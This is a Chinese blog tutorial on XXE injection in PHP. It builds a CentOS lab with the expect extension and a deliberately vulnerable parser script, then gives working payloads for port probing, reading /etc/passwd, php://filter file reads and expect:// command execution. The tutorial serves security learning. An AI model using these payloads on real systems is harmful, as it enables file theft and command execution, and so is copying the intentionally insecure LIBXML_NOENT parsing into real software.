PHP 环境 XML 外部实体注入漏洞从环境搭建到实操(全网最详细最齐全)

已于 2023-10-23 16:36:56 修改
阅读量209 收藏 3
点赞数 3
文章标签: 安全 web安全 网络安全 计算机网络
于 2023-10-17 20:29:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64652650/article/details/133893428
版权
  1. XML 介绍:

XML 语言全称为可扩展标记语言,与 HTML 超文本标签语言类似,而这两个的区别在于作用与使用方法:HTML

主要用来显示数据,而 XML 主要用于传输和存储数据.HTML 的使用方法有固定的格式,即只能使用自带的标

签,而 XML 则是使用自定义标签.

  1. XML 外部实体注入漏洞原理:

XXE 外部实体注入漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,从而导致会加载恶意

外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起 Dos 攻击等危害。

XXE 漏洞触发的点往往是可以上传 xml 文件的位置,没有对上传的 xml 文件进行过滤,导致可上传恶意 xml

文件。

  1. XML 外部实体注入漏洞环境搭建:

环境安装:系统为 CentOs7

  1. yum install expect

//安装操作系统 expect

  1. yum install php-devel //安装 PHP 开发所需文件的软件包
  2. yum install tcl //安装 tcl
  3. yum install tcl tcl-devel

//安装 tcl 软件包以及相应的开发文件

  1. yum install expect expect-devel

//安装 expect 软件包以及相应的开发文档

  1. 上传 php-expect 扩展包,下载地址:https://github.com/spektom/php-expect
  2. 执行以下代码进行编译安装

phpize

./configure

make

make install

  1. 修改配置文件,添加以下内容

extension=expect.so(配置文件所在地址:/etc/php.ini)

  1. 重启服务器

systemctl restart httpd

10 检测是否安装成功

进入/var/www/html 目录当中,创建一个 php 文件(文件名自取),在该文件当中写入<?php phpinfo()?>

然后去访问该虚拟机的 IP 地址下的该 php 文件,即 http://该虚拟机 ip 地址/该 php 文件即可.

成功后出现如下页面当出现该页面后

ctrl+F 搜索 expect,出现如下页面,即显示环境搭建成功,进而可以开始实验

  1. 实验步骤:

1.进入到/var/www/html 中,创建任意一个 php 文件(文件名自取),在其中输入以下代码

<?php

header("content-type:text/html;charset=utf-8");

date_default_timezone_set("PRC");

$data = file_get_contents('php://input');

$xml = simplexml_load_string($data,'SimpleXMLElement',LIBXML_NOENT);

echo date('Y-m-d H:i:s',time())."\n\r";

echo $xml;

?>

2. 去访问该文件(访问地址为 http://该虚拟机 ip 地址/该 php 文件),同时使用 Burp Suite 进行抓包,将

抓到的包放到重放模块(Repeater),然后进行实验.

  1. 进行实验,将你的 xml 代码放入到该页面当中,然后发送,即可看见效果.注意:你的 xml 代码一定不要与

该包数据紧挨着,有可能会造成 xml 代码无法解析.最好空一行再输入 xml 代码,如图:

端口检测:

这个实验效果不建议使用该方法进行,因为端口开启与关闭的效果差别不明显

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE note[

<!ENTITY xxe SYSTEM "http://192.168.235.128:80">

]>

<note>&xxe;</note>

文件读取:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE abc [ <!ENTITY xxe SYSTEM "file:etc/passwd"> ]>

<abc>&xxe;</abc>

php 伪协议文件读取:

<?xml version="1.0"?>

<!DOCTYPE abc [ <!ENTITY xxe SYSTEM "php://filter/convert.base64encode/resource=/etc/passwd" > ]>

<abc>&xxe;</abc>

命令执行:

<?xml version="1.0"?>

<!DOCTYPE abc [ <!ENTITY xxe SYSTEM "expect://pwd " > ]>

<abc>&xxe;</abc>

但注意,我们所登录的用户是 apache,它所拥有的权限有限制,大多数操作无法进行,例如创建文件等.

一天475
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁PH27509
Apache solr XML&RCE 漏洞(CVE-2017-12629)
weixin_44047654的博客
02-22 604
Apache Solr XXE & RCE 漏洞(CVE-2017-12629)
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
huangyongkang666的博客
07-25 1219
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
PHP环境 XML外部实体注入漏洞(XXE)
weixin_45022281的博客
10-13 1661
PHP环境 XML外部实体注入漏洞(XXE) 漏洞描述: libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。 风险等级: 高 影响版本: libxml2.8.0版本 漏洞复现: [1] dom.php 读取敏感文件 Simple XXE Payload: <?xml version="1.0"?> <!DOCTYPE ANY[ <!E
【渗透测试】XXE(外部实体注入):PHP_XXE解题简记
weixin_53972936的博客
10-26 1328
XXE漏洞发生在应用程序解析XML输入时,并没有禁止外部实体的加载,当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
网络安全web漏洞-xml外部实体注入(XXE)
A1_3_9_7的博客
12-28 978
xml可拓展标记语言:xml是一种可拓展的标记语言,可以用来存储数据,例如:我们经常看到一些.xml的文件;它还可以用来传输数据,我们可以直接将数据以xml的格式放在请求当中,发给服务器。XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
[Vulhub] PHP环境 XML外部实体注入漏洞(XXE)
weixin_45605352的博客
05-07 3104
0x01 预备知识 XXE是什么? XXE(XML External Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml 库,而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体外部参数实体)做合适的处理,并且实体的URL支持 file:// 和 ftp:// 等协议,导致可加载恶意外部文件和代码,造成 任意文件读取、命令执行、
BUUCTF-Real-[PHP]XXE
最新发布
分享
01-31 849
BUUCTF-Real-[PHP]XXE漏洞复现!
PHP XXE漏洞
weixin_30849591的博客
01-24 1068
PHP xml 外部实体注入漏洞(XXE) 1.环境 PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用 2.原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、...
Xml实体注入漏洞姿势总结
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 5066
Xml实体注入漏洞姿势总结
标准版Eclipse搭建PHP环境详细步骤
12-19
 插件下载完成之后,解压,然后把site.xml删掉(大部分插件不用删这个文件,但是PHPEclipse必须删),最后把整个文件夹复制到Eclipse的dropins文件夹里面,重启Eclipse即可。 三、在Eclipse新建PHP工程和新建PHP...
Centos7的apache网站环境搭建wordpress
01-20
需要安装apache,php,mariadb ...yum -y install php php-gd php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-snmp php-soap curl curl-devel php-mysql 安装MariaDB数据库 yum -y in
mybatis环境搭建
12-21
第一步:创建maven工程并导入坐标 ...IUserDao.xml select * from user 第五步:测试 前提:在mysql的数据库对应的表要有数据 我们在项目的test/java中创建一个测试类【com.mybatis.test.Myba
XXE(XML 实体注入)漏洞攻防分析1
08-08
所以XXE和xss,sqli 等一样都是比较广泛的漏洞,所以从以往发现的漏洞可以看到很多厂商都存在这种漏洞,包括邮箱、门户、通用CMS等,如网易、腾讯邮箱XXE
【XXE漏洞01】XML漏洞原理及实验
Fighting_hawk的博客
03-21 2922
1. 了解XXE的内容和原理。 2. 掌握XXE漏洞利用方法。 3. 掌握XXE漏洞的修改建议。
web漏洞-xml外部实体注入(XXE)
rumil的博客
10-09 1907
XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题",也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
(39.1)【XML漏洞专题】必备的基础知识、利用原理、构建规则
04-24 1792
【专题】XML利用必备基础知识
搭建漏洞环境Vulhub的使用
https://www.cnblogs.com/zpchcbd/
05-07 2391
介绍 Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 建议安装在云服务器上,腾讯云、阿里云、或者国外的服务器上,这些环境不需要vps即可快速安装好环境,本地搭建需要vps支持,或者下载整个源码。由于第一次使用漏洞环境是在线下载并编译,所以最好使用云服务器或者vps...
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值